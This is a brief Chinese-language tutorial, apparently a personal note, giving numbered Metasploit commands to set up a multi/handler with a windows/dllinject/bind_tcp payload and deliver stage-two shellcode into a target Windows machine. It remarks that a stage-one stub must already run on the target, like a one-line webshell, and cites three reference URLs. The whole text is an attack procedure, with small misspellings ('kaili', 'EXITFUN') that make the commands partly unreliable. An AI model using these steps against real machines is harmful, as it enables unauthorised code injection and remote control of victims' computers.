1.进入kaili打开msfconsole
2.然后use multi/handler
3.然后 set PAYLOAD windows/dllinject/bind_tcp
4.然后set 参数 set DLL /download/xx.dll
set EXITFUN seh
set LPORT 4444
5.最后运行exploit
这样就可以把stage2的shellcode发过去了。
注意:stage1的代码要在目标的机器上运行。相当于webshell的一句话。
参考:
http://www.metasploit.cn/thread-1005-1-1.html
http://www.shellsec.com/tech/32268.html
http://blog.csdn.net/gaara_fan/article/details/6528359